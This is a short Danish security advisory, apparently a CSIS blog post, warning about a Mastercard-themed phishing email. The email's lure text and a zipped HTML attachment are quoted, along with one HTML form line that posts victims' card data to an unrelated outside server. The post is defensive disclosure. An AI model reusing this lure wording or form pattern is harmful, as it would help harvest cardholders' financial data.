En usædvanligt snedig og velformuleret phishing kampagne, som lokker vilkårlige brugere til at opgive sensitive oplysninger er i omløb.
Den uønskede e-mail ankommer med følgende indhold:
Fra: Information [SecureCod@mastercard.dk]
Emnelinje:
FW: Artikel 201/02/2014
Indhold:
I overensstemmelse med artikel 201/02/2014, for den Europæiske Union, fra 14/02/2014 til fortsat at bruge dit kreditkort online, er du kræves for at fuldføre godkender vedlagte formular.
Vedhæftet:
mastercard.zip -> MasterCard.html
Den medfølgende html fil lokker ofret til at opgive flere yderst sensitive data. Se skærmdump herunder:
Data der opgives, den lokale formular, sendes til en server, som intet har med Mastercard at gøre, men det kan ofret ikke se:
<form method="post" action=http://www.powerfit24.at/mail.php>
Vi har blokeret domænet i CSIS Secure DNS og Heimdal yder desuden også beskyttelse mod datatab i forbindelse med dette phishing angreb.
↧
CSIS Blog: Snedig Mastercard phish i omløb
↧